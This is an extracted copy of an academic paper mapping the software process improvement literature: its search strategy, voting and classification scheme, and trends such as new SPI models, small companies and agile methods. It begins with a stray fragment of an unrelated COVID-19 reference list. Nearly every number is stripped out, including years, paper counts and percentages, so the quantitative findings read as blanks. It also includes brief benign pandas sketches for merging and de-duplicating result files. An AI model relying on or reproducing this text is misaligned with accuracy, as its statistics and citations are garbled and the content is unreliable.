xiao m, guo j, cai m, yang j, li y, meng x. . a deep learning algorithm using ct images to screen for corona virus disease (covid- ). medrxiv preprint wei l, su r, wang b, li x, zou q, gao x. a. integration of deep feature representations and handcrafted features to improve the prediction of n -methyladenosine sites. neurocomputing : – doi . /j.neucom. . . . wei w, zhou b, polap d, woźniak m. b. a regional adaptive variational pde model for computed tomography image reconstruction. pattern recognition : – doi . /j.patcog. . . . wieczorek m, silka j, woźniak m. . neural network powered covid- spread forecasting model. chaos, solitons & fractals : . 
wu f, zhao s, yu b, chen y-m, wang w, song z-g, hu y, tao z-w, tian j-h, pei y-y, yuan m-l, zhang y-l, dai f-h, liu y, wang q-m, zheng j-j, xu l, holmes ec, zhang y-z. . a new coronavirus associated with human respiratory disease in china. nature : – .
xie x, zhong z, zhao w, zheng c, wang f, liu j. . chest ct for typical -ncov pneumonia: relationship to negative rt-pcr testing. radiology ( ):e –e .
zhang j, sanderson ac. . jade: adaptive differential evolution with optional external archive. ieee transactions on evolutionary computation ( ): – doi . /tevc. . .
zhang j, xia y, xie y, fulham m, feng dd. . classification of medical images in the biomedical literature by jointly using deep and handcrafted visual features. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . .
zheng c, deng x, fu q, zhou q, feng j, ma h, liu w, wang x. . deep learning-based detection for covid- from chest ct using weak label. medrxiv doi . / . . . .
submitted february , accepted april , published may
corresponding author: marco kuhrmann, kuhrmann@mmmi.sdu.dk
academic editor: marlon dumas
additional information and declarations can be found on page
doi . /peerj-cs.
copyright kuhrmann et al., distributed under creative commons cc-by . open access

software process improvement: a systematic mapping study on the state of the art
marco kuhrmann, philipp diebold and jürgen münch
maersk mc-kinney moller institute, software engineering, university of southern denmark, odense, denmark
process engineering, fraunhofer institute for experimental software engineering, kaiserslautern, germany
herman hollerith center, böblingen & reutlingen university, böblingen, germany
department of computer science, university of helsinki, helsinki, finland

abstract
software process improvement (spi) has been around for decades: frameworks are proposed, success factors are studied, and experiences have been reported. however, the sheer mass of concepts, approaches, and standards published over the years overwhelms practitioners as well as researchers. what is out there? are there new trends and emerging approaches? what are open issues? still, we struggle to answer these questions about the current state of spi and related research. in this article, we present results from an updated systematic mapping study to shed light on the field of spi, to develop a big picture of the state of the art, and to draw conclusions for future research directions. an analysis of publications draws a big picture of spi-related research of the past quarter-century. our study shows a high number of solution proposals, experience reports, and secondary studies, but only a few theories and models on spi in general. in particular, standard spi models like cmmi and iso/iec are analyzed, enhanced, and evaluated for applicability in practice, but these standards are also critically discussed, e.g., from the perspective of spi in small-to-medium-sized companies, which leads to new specialized frameworks. new and specialized frameworks account for the majority of the contributions found (approx. %). furthermore, we find a growing interest in success factors (approx. %) to aid companies in conducting spi and in adapting agile principles and practices for spi (approx. %).
beyond these specific topics, the study results also show an increasing interest into secondary studies with the purpose of aggregating and structuring spi-related knowledge. finally, the present study helps directing future research by identifying under-researched topics awaiting further investigation. subjects software engineering keywords spi, software process, systematic mapping study, software process improvement introduction software process improvement (spi; according to humphrey, ) aims to improve software processes and comprises a variety of tasks, such as scoping, assessment, design and realization, and continuous improvement, e.g., münch et al. ( ). in this field, a number of spi models competes for the companies’ favor, success factors to support how to cite this article kuhrmann et al. ( ), software process improvement: a systematic mapping study on the state of the art. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:kuhrmann@mmmi.sdu.dk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. spi implementation at the large scale and the small scale are studied, and a multitude of publications report on experiences in academia and practice. horvat, rozman & györkös ( ) consider spi an important topic (regardless of the company size), as many companies put emphasis on the software process and its adaptation to the company context (diebold et al., ; vijayasarathy & butler, ; theocharis et al., ) to address different improvement goals, such accelerating software development or improving software quality. however, spi is a diverse field: on the one hand, a number of standards is available, e.g., the capability maturity model integration (cmmi) or iso/iec . on the other hand, these standards are criticized oftentimes, as for instance by brodman & johnson ( ), staples et al. ( ) and coleman & o’connor ( ). dictating processes and/or process improvement programs can lead to serious organizational ‘‘immune reactions’’ (baddoo & hall, ), e.g., of developers (umarji & seaman, ) and entire companies due to lacking resources (hall, rainer & baddoo, ). in response, several tailored standard spi models or custom spi approaches are proposed, inter alia, to better address needs of small and very small companies, e.g., raninen et al. ( ), rozman et al. ( ) and pino et al. ( ), or to adapt agile principles in the improvement process (salo & abrahamsson, ). moreover, since spi is mainly a human endeavor, much research was spent to study human factors, e.g., stelzer & mellis ( ), allison ( ), viana et al. ( ) and laporte & o’connor ( ). those factors, furthermore, play an important role when spi is conducted at the global scale, as for instance described by paulish & carleton ( ), or if large companies want to deploy agile processes as for instance presented by hannay & benestad ( ) or korhonen ( ). beyond, we find numerous experience reports, guidelines, and tools—all together providing a huge body of knowledge on spi. however, despite this comprehensive body of knowledge, from the authors’ perspective, we lack a big picture of spi and we still struggle to answer questions like: what is out there? what are open issues? are there new trends and emerging approaches, and if yes, what are the new trends? what is the current state of spi and related research after all? problem statement & objective. 
the field of spi evolved for decades and provides a vast amount of publications addressing a huge variety of topics. still, we see new method proposals, research on success factors, and plenty of experience reports. yet, missing is a big picture that illustrates where spi gained a certain level of saturation, what are the hot topics, and what are unresolved issues calling for more investigation? to better understand the state of the art in spi, we aim to analyze the whole publication flora to draw a big picture on spi. our overall goal is not to judge particular spi research directions, but to provide the focus points of the past and to illustrate emerging/unresolved areas to show the directions for future research in this field. contribution. in this article, we present findings from an updated comprehensive systematic mapping study. starting with a curiosity-driven study, in two stages, we conducted a broadband search in six literature databases and one meta-search engine to harvest spi-related publications from the past years, and we incrementally analyzed the resulting publications for publication frequency, research type facet, contribution type facet, and we categorized the found publications using a set of metadata attributes. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we draw a big picture showing that the majority of the publications on spi either proposes custom/new approaches (i.e., models or frameworks) or is of philosophical nature (i.e., collecting, structuring, and analyzing knowledge). our results show a constant publication of new approaches while evaluation of these proposals is scarcely available. our data shows rare evidence and, notably, missing long-term and independently conducted replication studies. however, the data also reveals some (still) emerging topics, e.g., spi for very small and medium-sized companies, and spi in the context of lean and agile methods. context & previously published material. the present study is a substantial update of our initial study published in kuhrmann et al. ( ). in the course of updating the study, in particular, we added the following procedures/content: to provide an instrument that allows for continuously updating the study, we defined a new data collection procedure (appendix ‘data collection in the study update’), which we implemented to carry out the update presented here. the update adds new papers to the result set, which now contains papes in total. furthermore, we modified the data classification approach. to achieve higher precision, we defined metadata attributes, and we applied these attributes to the dataset while excluding the focus type facet from the analysis (cf. ‘threats to validity’). finally, while our initial study aimed to identify major trends, in this article, we provide a more detailed analysis of the trends found using the new classification. outline. the remainder of this article is organized as follows: ‘related work’ summarizes and discusses related work. in ‘research design,’ we detail the study’s overall research design. since this article presents an updated systematic mapping study, the article’s appendix details the original and updated research methods as well as required reference data. we present and discuss the study results in ‘study results and discussion’, and conclude the article in ‘conclusion & future work.’ related work literature on software process improvement is rich and addresses a variety of topics. 
yet, available secondary studies mainly focus on investigating success factors, e.g., monteiro & de oliveira ( ), bayona-oré et al. ( ) and dybå ( ). some studies provide insights into selected spi topics, as for instance: helgesson, höst & weyns ( ) review maturity models, and hull et al. ( ) and el-emam & goldenson ( ) review different assessment models. pino, garcía & piattini ( ) contribute a review on spi in the context of small and very small companies, and staples & niazi ( ) study motivating factors to adopt cmmi for improvement programs, while müller, mathiassen & balshøj ( ) study spi in general from the perspective of organizational change. all these representatively selected studies address specific topics, yet they do not contribute to a more general perspective on spi. such general studies are scarcely to find. for instance, rainer & hall ( ) analyze some ‘core’ studies on spi for the purpose to work out addressed topics and gaps in the domain. however, they select few studies of which they assume to be good representatives thus providing a limited picture only. in terms of analyzing the entire domain and providing new (generalizable) knowledge, unterkalmsteiner et al. ( ) contribute a systematic review on the state of the art of evaluation and measurement in kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. spi. they conduct a systematic review for the purpose of synthesizing a list of evaluation and measurement approaches, which they also analyze for the practical application. the study at hand does not aim at generating generalizable knowledge for one or more spi-related topics in the first place. the purpose of the present study is to draw a big picture of the current state of the art of spi in general. that is, as there is no comparable study available, this article closes a gap in literature by providing a comprehensive picture of the development of the field of spi over time and by summarizing the current state of the art. other than, e.g., rainer & hall ( ) or unterkalmsteiner et al. ( ), we use the mapping study instrument according to petersen et al. ( ) as research method and to present our results. therefore, our study does not address one specific aspect/topic, but aims to draw a general picture from a ‘‘bird’s-eye perspective’’ to pave the way for further topic-specific and more detailed studies. research design in this section, we present the overall study design. after describing the selected research method, we introduce the research questions, and describe the different instruments used for data collection and analysis, and the validity procedures. research method in this study, we ground the overall research approach in the procedures implemented for our previously published initial study. in kuhrmann et al. ( ), we followed an approach in which we applied different methods from systematic literature reviews (slr) according to kitchenham & charters ( ) and systematic mapping studies (sms) as presented by petersen et al. ( ). while carrying out the study update, we used and improved the methods applied, which was necessary to develop a strategy that allows for continuous study updates. figure shows the overall research approach for which we provide details in subsequent sections. initial study. the initial study was designed as a breadth-first search to cover the spi domain as complete as possible. 
in february , we performed the study preparation, conducted a series of test runs, and refined the search queries iteratively. at the end of april , we conducted the main search, which resulted in about , hits. as we expected this large number of results, and in order to support the dataset cleaning, we defined filter questions, which we applied to the initial result set. when the initial result set was cleaned, we performed a voting procedure to select the relevant publications from the result set. based on this selection, we developed the classification schemas (by manual sampling as well as tool-supported) and harmonized the dataset (e.g., completion of keyword lists).

study update procedure. as one of the goals was to develop an instrument that provides a 'heartbeat' of the whole field, having a strategy available to continuously update and refine the study was imperative. therefore, after having conducted and analyzed the initial study, we collected lessons learned and developed the update strategy. the outcome is shown in the right part of fig. . the revised approach comprises a changed data collection procedure (appendix 'data collection in the study update') and an improved study classification procedure ('analysis and classification').

figure : overview of the applied research methods in the initial study (left part of the figure) and in the study update procedure (right part of the figure); the depicted workflow steps range from query development/update and data source selection over test runs and refinement, data collection, cleaning, and harmonization to publication selection and classification.

the update procedure was defined in august , and the actual update was performed from september to november . in subsequent sections, we describe this new strategy, whereas the particular changes are documented in detail in the appendix of this article.

research questions
our objective is to capture the domain of software process improvement (spi), to provide a continuously updated snapshot of the available publication pool, and to investigate research trends. therefore, we define the following research questions:

rq1: what is the general publication population on spi? this research question aims to get an overview of the general publication pool on spi. we are interested in information regarding publication count and frequency and, eventually, an overview of the different research type facets addressed by the found publications.

rq2: what is the contribution population? based on the found publications, we are interested in the addressed topics and major contributions (e.g., spi models, theories, secondary studies, and lessons learned) to work out the spi topics to which research has contributed so far.

rq3: what trends in spi and spi-related research can be observed? the third research question aims at investigating the focus points addressed by spi research so far and at working out gaps as well as trends. this research question shall pave the way to direct future research on spi.
data collection procedures
as mentioned in 'research method', due to lessons learned in the initial study and in order to provide a feasible strategy for study updates, the research approach had to be improved. the most significant changes regarding the data collection procedure are described in appendix 'data collection procedures.' in the following, we describe the actual data collection procedure applied to the present study.

query construction. the basic queries were already developed in the initial study (appendix 'query construction'). after the initial result set analysis, the query strings were critically reviewed and updated (fig. ). however, no new search terms were added; only the structure of the queries required some updates to address the new data source that serves as the main input. in a nutshell, due to the change of the search engine, the main search strings s –s were integrated with the context and filter queries, which were required in the initial study to help querying the different literature databases. the full new search queries can be taken from table (appendix 'search queries').

data sources and data format. in the present study, after reviewing the initial study designs and results, we looked for more efficient ways to fetch papers for the update and eventually opted for scopus as the new search engine (scopus is available from http://www.scopus.com). before we made this decision, we tested scopus: we took some initial search queries (table ), queried scopus, and compared the obtained data with the original datasets. we then iteratively enhanced the scopus search strings and, eventually, defined the following quality requirement for the search: given the trends in publication frequency and classification obtained in the initial study, we expect a similar frequency and classification for the scopus-based search (see also 'result overview'). having executed the different queries, the obtained data was merged into one spreadsheet that structures the data and contains the attributes shown in table . the data structure shown in table follows the structure used in the initial study.

table : spreadsheet layout to collect, structure, and evaluate data (information set: attributes and description).
- study keys: running no. (unique number in the dataset), no. (unique number in the database), database
- content: title, authors, year, keywords/tags, abstract
- voting: relevance (defined during further analysis and voting by the different authors, cf. 'analysis preparation'), disc (decision field to be set in workshops if a paper was marked for discussion), result (paper is in or out)
- publication vehicle: a publication is published in either a journal, magazine, conference, workshop, book, or miscellaneous (cf. fig. )
- research type facet: classification of a paper according to the research type facet (rtf) as proposed by wieringa et al. ( )
- contribution type facet: classification of a paper according to the contribution type facet (ctf) according to shaw ( ) (see also petersen et al., )
- metadata: collection of metadata per paper according to the structure from fig.
- further information: further information and/or further metadata to be collected
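the full search strings themselves are only given in the appendix; purely as an illustration of what such a scopus-style query and the merged spreadsheet could look like, consider the following sketch. the query text, file names, and column names are assumptions, not the authors' actual artifacts.

```python
# illustration only: the authors' real search strings are listed in the appendix,
# and the file/column names below are assumed placeholders.
import pandas as pd

# a hypothetical scopus-style query combining a search term with context filters
SPI_QUERY = ('TITLE-ABS-KEY("software process improvement") '
             'AND SUBJAREA(COMP) AND PUBYEAR > 1989')

# merge the exported result lists of the individual query runs into one spreadsheet
frames = [pd.read_csv(f) for f in ["scopus_s1.csv", "scopus_s2.csv", "scopus_s3.csv"]]
papers = pd.concat(frames, ignore_index=True)

# add the bookkeeping and voting attributes described in the spreadsheet layout
papers["running_no"] = range(1, len(papers) + 1)
for col in ["relevance_r1", "relevance_r2", "disc", "result"]:
    papers[col] = None

papers.to_excel("spi_result_set.xlsx", index=False)
```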
analysis procedures
we describe the analysis preparation as well as the steps conducted to answer the research questions.

analysis preparation
we performed an automated search, which required us to filter and prepare the result set. the data analysis is prepared by harmonizing the data, performing a multi-staged voting process, and integrating the initial and the update data sets to prepare the result set analysis.

figure : overview of the collected metadata in the study analysis phase, including the publication vehicles and the study-specific attributes and their grouping into topic clusters (dimensions): publication vehicle; process (publication objective, assessment and assessment models, (quasi-)standards and techniques); study type/method; and context (life cycle phases, company size and scale, application domain).

table : inclusion and exclusion criteria applied to the study.
- ic: title, keyword list, and abstract make explicit that the paper is related to spi.
- ic: paper presents spi-related topics, e.g., spi models, assessments, experiences in adopting and deploying software processes, and reports on improving specific methods/practices.
- ec: paper is not in english.
- ec: paper is not in the field of software engineering or computer science in general.
- ec: paper is a tutorial or workshop summary only.
- ec: paper occurred multiple times.
- ec: paper full text is not available for download.

harmonization. to make the selection of the contributions more efficient, we first integrated and cleaned the result set. we removed the duplicates, which we identified by title, year, and author list. the main instrument used was the microsoft excel feature to identify and remove duplicates (cf. appendix 'search and cleaning procedure'). this procedure was performed on the integrated result set.

voting. we applied the voting procedures as described in kuhrmann et al. ( ); that is, we performed a multi-staged voting process to classify the papers as relevant or irrelevant and to build a set of publications for further investigation (table , voting). in the voting process, the inclusion and exclusion criteria listed in table guided the decision-making. two researchers performed individual votes (initially on publication title and abstract). if both agreed, the paper was directly included or excluded. for papers on which they did not immediately agree, workshops were performed to resolve the disagreements. after the initial voting, the selection was reviewed by a third researcher for confirmation.

integration. in the final step, we integrated the initial result set from kuhrmann et al. ( ) with the scopus update. due to the expected overlaps (search year ), we checked the result set for duplicates again and, if necessary, removed the found duplicates.
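continuing the sketch above, the harmonization and voting steps could be illustrated as follows; this is not the authors' tooling (they used microsoft excel), and the column names are assumed.

```python
# illustrative sketch only: the authors performed these steps in microsoft excel;
# column names such as "title", "year", "authors", "vote_r1", "vote_r2" are assumed.
import pandas as pd

papers = pd.read_excel("spi_result_set.xlsx")

# harmonization: remove duplicates identified by title, year, and author list
papers = papers.drop_duplicates(subset=["title", "year", "authors"], keep="first")

# voting: papers both reviewers agree on are decided directly;
# the remaining papers are marked for discussion in a workshop
agreed = papers["vote_r1"] == papers["vote_r2"]
papers.loc[agreed, "result"] = papers.loc[agreed, "vote_r1"]
papers.loc[~agreed, "disc"] = "discuss in workshop"

print(len(papers), "papers after de-duplication,",
      int((~agreed).sum()), "marked for discussion")
```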
analysis and classification on the final set, the analysis and classification were performed using the abstracts and—where necessary—the complete publication. generally, each classification step was conducted independently by two researchers, merged, discussed, and eventually checked by the third researcher. in the following, we summarize the analysis procedures used to answer our research questions. research type facets. in order to classify the publications, we rely on the classification according to the research type facet as proposed by wieringa et al. ( ). however, during a test classification on a small sample, we found the need to adjust the facet definitions. table lists the research type facets as applied to the result set. contribution type facets. in order to analyze what and how publications contribute to the body of knowledge, we adopted the contribution type facets as proposed by shaw ( ). table lists the facet types applied to the result set. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the initial study kuhrmann et al. ( ), the focus type facets were found inadequate for this study stage, e.g., due to variety of the topics addressed and the limitations to define proper topic clusters or the need to have multiple assignments for many papers. table applied research type facets as proposed by wieringa et al. ( ). criteria description evaluation research implemented in practice, evaluation of implementation conducted; requires more than just one demonstrating case study solution proposal solution for a problem is proposed, benefits/application is demonstrated by example, experiments, or student labs; also includes proposals complemented by one demonstrating case study for which no long-term evaluation/dissemination plan is obvious philosophical paper new way of thinking, structuring a field in form of a taxonomy or a framework, secondary studies like slr or sms opinion paper personal opinion, not grounded in related work and research methodology experience paper personal experience, how are things done in practice table applied contribution type facets as proposed by shaw ( ). criteria description model representation of observed reality by concepts after conceptualization theory construct of cause–effect relationships framework frameworks/methods related to spi guideline list of advices lessons learned set of outcomes from obtained results advice recommendation (from opinion) tool a tool to support spi metadata. instead of applying the focus type facet to the result set, we opted for the collection of metadata. the metadata attributes of interest were initially collected and structured in a workshop in which the lessons learned from the initial study were taken into account. during the metadata collection, reviewers had the option to propose and add further attributes, i.e., the list of metadata was extended and then the result set was revisited (see also fig. ). figure provides a structured overview of the metadata. in particular, we collected metadata in the following four categories: publication vehicle, study type and method, process, and context. the publication vehicle is an xor-selection, i.e., a paper is for instance either a conference paper or a journal article. the other three categories (dimensions) can comprise sub-categories and allow for multiple selection. 
for example, a paper can contain an slr-based spi model, which is confirmed using an expert interview (dimension: study type and method), and the study can address an agile/lean custom model that adopts cmmi (dimension: process) in an sme company that works in medical devices, and improves quality management and test (dimension: context). validity procedures to increase the validity of our study, we implemented the following procedures: we extensively reused our initial research design, which we only modified in terms of the kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data collection and filtering results of the study update, and total numbers of studies after merging and cleaning initial and update datasets. automatic search manual selection integration hits ec ec , voting discussion merge final s s , , s s , , s , s s , , s total , , , data collection procedures. furthermore, during the whole study, we performed several quality assurance activities (partially tool-supported), iterated through the single steps, and stepwise analyzed and refined tentative result sets. during the publication selection and classification, we relied on researcher triangulation, e.g., within a rigorous multi-staged voting procedure in which two researchers carried out the initial classification and the third researcher confirmed the classification. for the development of the classification schemas, we either ground the developed schemas in external proposals or rely on flexible and extensible metadata. finally, we continuously compared tentative results with findings from our initial study to check for general trends. study results and discussion in this section, we present and discuss the results of our study. in ‘result overview’, we provide an overview of the whole result set and discuss the development of the domain observed in the study update. ‘rq : general publication flora’, ‘rq : result set contribution,’ ‘rq : trends in spi-related research,’ answer the research questions, before we discuss our findings in ‘discussion’. finally, we discuss threats to validity of this study in ‘threats to validity.’ result overview in this section, we provide an overview of the whole result set. since the present study is an update study, the starting point for the study at hand is the result set from kuhrmann et al. ( ). an overview of this initial result set can be taken from table . the study update covers . years and comprises publications from january to july . the outcomes of the search, cleaning, and merge procedures are shown in table . the table shows seven papers removed in the merge procedures, which are multiple occurrences in (eight papers were found in the initial study, which were integrated with the update result set). figure visualizes the publication frequency of the integrated result set by showing the number of publications over time including two trend lines (trend calculation basis: kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overall publication frequency (papers on spi published per year). mean, -year and -year period). in , the numbers show a growing interest in spi. from this point on, spi became an inherent part of software engineering research. figure shows periodical waves over the years starting three to five years, which is emphasized by the first -year trend line. within these waves the largest gap/decrease is between and . 
another big jump can be seen in , where the number of papers increased by approximately %. furthermore, fig. shows spi still being a field of interest, as the second -year trend line shows. the majority of the papers in the result set are journal articles (n= , . %) and conference papers (n= , . %). magazine articles (n= ) and workshop papers (n= ) count for . % and . %. the result set does not contain books, but three papers ( . %) that are classified as miscellaneous (mostly book chapters). in summary, the updated study includes papers on spi published between and july , which are subject to analysis. ‘rq : general publication flora’, ‘rq : result set contribution,’ ‘rq : trends in spi-related research’, we provide the detailed analysis to answer the research questions. result set quality assurance. as mentioned in ‘data collection procedures,’ we changed the data collection procedure and, thus, we defined the quality requirement that the update result set should ‘‘harmonize’’ with the initial result set, i.e., the update set should show similar trends and distribution. this quality assurance was carried out using the aforementioned trend analysis and using the different research- and contribution type facets (cf. ‘rq : general publication flora’). figure shows the average (absolute) paper numbers and the relative distribution per category. the figure visualizes these numbers for three data points: the average in the merged dataset, and the average of the data from – and the study update ( – ), respectively. given the trend (fig. ) and the about % increase of publications per year, still, the relative distribution of the papers in the update result set follows the general trend of the result set, which could just be observed in our initial study. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overview of the (average) paper numbers and percentage in the result sets. both parts show a similar distribution in the different cate- gories in the entire result set and the subsets addressed by the initial study and the study update. rq : general publication flora to get an overview of the harvested papers, we performed a categorization to define the research type facets and contribution type facets (tables and ). to analyze the respective trends, fig. provides an integrated picture that shows the papers in the different categories and over time. regarding the research type facet, fig. shows a clear trend towards solution proposals (n= , . %) and philosophical papers (n= , . %). from the papers in the result set, papers ( . %) are classified as evaluation papers and papers ( . %) are classified as experience papers. only six out of papers ( . %) are opinion papers. taking into account the general trend of the result set (fig. ), the classification according to the research type facet indicates a still evolving research field. figure illustrates, in average, approx. % of the published papers per year are either proposing ‘‘something new’’ or discussing an spi-related topic from new/different perspectives, e.g., using secondary studies such as systematic reviews or mapping studies (n= , . %). at the same time, only about a quarter of the published papers per year deals with evaluating research or reporting experiences. figure (lower part) shows a similar tendency for the contribution type facet. from the papers in the result set, papers ( . %) contribute lessons learned, followed by papers ( . 
%) that contribute custom or new frameworks. all remaining categories are below %, in particular, models (n= , . %), theories (n= , . %), guidelines (n= , . %), advice (n= , . %), and tools (n= , . %). that is, approx. % of all papers either propose frameworks or discuss lessons learned, which is, again, consistent with the overall trend over time. an impression about the progress in the field can be depicted from fig. in which we create a first systematic map relating the research- and the contribution type facet. the figure shows that most of the frameworks have to be considered a solution proposal kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure number of papers per year and relative distribution over research type facet (a) and contribution type facet (b). ( out of ), but only papers from the category framework are classified as evaluation research. similar, about two third of all papers classified as lessons learned ( out of ) are classified as philosophical paper, i.e., lessons learned are drawn from discussion/observation in artificial or lab environments or concluded from secondary studies. from the lessons-learned papers, are classified as evaluation research and as experience reports, which together makes approx. % of all lessons learned papers. furthermore, out of papers that contribute models to the result set are classified as solution proposal ( papers) or philosophical paper ( papers). that is, models on spi are either proposed awaiting their evaluation or those models are concluded from discussion or secondary studies, also awaiting evaluation. the same picture can be observed for theories: out of papers that are classified as contributing a theory are also classified as philosophical paper, and only two are classified as evaluation research. summary. from the top-level analysis using the basic classification schemas, we can observe: in the result set, we see a clear trend towards proposing new solutions, and the majority of the proposed solutions considers spi frameworks. a second major trend is reporting lessons learned. these trends can be observed in the final result set as well as over time. regarding the proposed frameworks, approx. % ( out of framework-related papers) are classified as solution proposals, i.e., method- or framework proposals without kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure systematic map over research- and contribution type facets. any evaluation or with theoretical or lab-based evaluation only. similar, approx. % of all reported lessons learned ( out of ) are classified as philosophical paper, i.e., conclusions are drawn from theoretical or lab-based evaluation only. in summary, the big picture presented in this section shows a still evolving research field, which is developing new approaches and collecting lessons learned, but this field still lacks evaluated models and theories. rq : result set contribution in this section, we provide a more detailed perspective on the result set using the collected metadata as illustrated in fig. . while classifying the result set, we collected metadata for the three dimensions study type and method, process (incl. sub-categories), and context (incl. sub-categories). in addition to the publication vehicle, we defined attributes, and each paper could be assigned none or many of these attributes (‘analysis and classification’). 
in total, for the studied papers, we assigned , attribute values. all metadata assignments are summarized in fig. and discussed in the following.

figure overview of the different metadata attributes addressed over time. the darker the color, the more papers in a year have this attribute assigned, whereas a paper can have multiple attributes assigned.

dimension: process. within this dimension, we built the three categories assessment and assessment models, (quasi-)standards, and publication objective, which provide the following insights: within the topic of assessment and assessment models, we focused on common assessment (maturity) models. most frequently mentioned is cmmi with assigned papers, followed by iso/iec , which is assigned to papers. beyond the common standards, papers are devoted to measurement in general. a more detailed discussion on the standard approaches cmmi and iso/iec can be found in ‘new and customized spi models’. regarding the (quasi-)standards (and techniques), the overall result set indicates that these aspects are considered of low relevance for the community. most frequently mentioned are six sigma, continuous improvement, and psp/tsp (each with less than mentions). not yet clear is the relevance of standards like iso/iec ; we see some mentions, but there is some movement and continuous development of such standards. therefore, a meaningful trend analysis cannot yet be conducted. in the publication objective category, we analyzed the major research directive of a publication. figure shows four attributes in the spotlight: a considerable share of the papers ( out of ) deals with custom or new models, and the data shows the number of custom/new models continuously increasing. this trend, which was already found in the initial study, is discussed (together with the use of standard approaches) in ‘new and customized spi models’. furthermore, papers cover general improvement as a trend. additionally, the result set contains papers addressing spi success factors with an increasing interest over the years. in ‘spi success factors,’ we provide more details on this topic. finally, with mentions, agile and lean development constitutes the fourth trend with an increasing number of publications. we provide details in ‘spi and agility’.

dimension: study type and method. within the six different attributes defined for this dimension, fig.
shows single and multiple/longitudinal case studies the major instruments, followed by survey research and interview studies. however, as these instruments are often combined, i.e., in many case studies, data collection is carried out using interviews. although the result shows so-called mixed method approaches applied to spi research, still, single case studies (quite often carried out with students in lab environments) account for the majority of the selected research methods. nevertheless, in recent years, an increasing number of secondary studies (i.e., systematic reviews and mapping studies) could be found. this indicates the community starting to systematize and categorize spi knowledge. the result set clearly shows the research field lacking replication studies. dimension: context. within the dimension context, we defined the three categories life cycle phase, company size and scale, and application domain, which provide the following insights: regarding the life cycle phases, project management ( mentions) and quality manage- ment ( mentions) are in the spotlight (continuously covered and without specific peaks). they are followed by requirements engineering ( mentions) and testing ( mentions), whereas testing as topic is often combined with (general) quality management. architecture and design as well as implementation received few mentions (less than each). the companies sizes and scales addressed in the papers show a trend towards very small entities (vse) and small-to-medium-sized enterprises (sme). in the result set, papers deal with companies of this sort, while papers address companies of other scales, i.e., large companies and global players. in ‘spi for smes’, we investigate this attribute group in more detail. furthermore, global distribution of software development is addressed kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. by papers, whereas this is a cross-cutting concern that is addressed by companies of all sorts. considering the different application domains, the largest share of papers deals with embedded systems in general ( mentions) or specific embedded domains such as medical devices, automotive software, or mission-critical and defense systems (less mentioned specific embedded domains are classified under general). the application domain of telecommunication systems is mentioned times. we also consider the papers addressing skills and education, e.g., by describing industrial training programs or university courses, as application domain. summary. figure presents an overview of the metadata attributes assigned to the papers from the result set. the figure shows the major trends that we already observed in our initial study (kuhrmann et al., ): spi-related research has a strong focus on custom/new models and success factors, standard assessment/maturity models like cmmi or iso/iec are well-researched, and spi in the context of vses/smes and agile and lean software development as part of spi have to be considered major trends. the set of metadata attributes defined for this study provides further insights: for instance, major fields of interest in spi research are project management and quality management (often in combination with testing), and spi is relevant to all application domains and to all company sizes (which confirms horvat, rozman & györkös, ). 
however, we also have to mention that due to the nature of this study, we were so far not able to assign attributes for all dimensions to all papers. only papers ( %) were assigned to attributes covering all three dimensions, papers ( %) cover two dimensions, and ( %) have attributes in only one dimension. therefore, the presented overview does not yet provide a complete picture, and we discuss this threat to validity in ‘threats to validity’. rq : trends in spi-related research our initial study kuhrmann et al. ( ), inter alia, had the purpose to reveal trends in spi-related research to identify those fields that have reached a certain saturation and those that either require more attention or reflect a particular problem-driven need. the initial results pointed to trends or streams worth further inspection: (new) spi models, spi success factors, spi in small-to-medium-sized enterprises (sme), and agility as spi. in subsequent sections, we primarily focus on these trends/streams, before discussing further observations. new and customized spi models in the field of spi, existing (standard) models are customized or completely new models are proposed. this trend can be observed now for years, as fig. illustrates. starting from the very beginning on, new or customized models are proposed every year. in total, the result lists out of papers (approx. %) with this purpose. as shown in fig. , in the present study, we collected metadata regarding different (quasi-) standard and well-disseminated approaches. in the following, we provide a detailed analysis on the share of customized and new models, and we analyze how these approaches are integrated with each other and what their scientific maturity is. figure shows a systematic map that illustrates two aspects: in lower part the research maturity and the contribution of papers addressing standard maturity models is shown. in total, out kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure trend chart of the share of papers that present customized and/or new spi models. of papers address cmmi, iso/iec or both. the classification according to the research- and contribution type facet shows that for standards and standard-related spi research many lessons learned are reported and that some evaluation research is available. from those papers addressing standard approaches, deal with developing customized spi models, which are grounded in these standards. whether a custom/new spi model is based on one of the standards is visualized in the upper part of fig. . from the papers proposing custom/new spi models, are based on the standard models, i.e., papers do not ground their contribution in standards and use other practices. in particular, four papers mentioned to reuse/extend six sigma, eight reused/extended the continuos improvement principle, three papers refer to psp/tsp, and one paper refers to competisoft. moreover, fig. shows that the result set contains solution proposals, but only papers that are categorized as evaluation research or experience paper. among the papers, ( . %) explicitly mention to cover spi for smes (see also ‘spi for smes’) with a focus on improving the project management (four papers) and general quality management processes (three papers). the processes associated with the different life cycle phases (fig. ) are represented as follows: ( . %) papers aim at improving the general quality management, ( . %) address project management, and ( . 
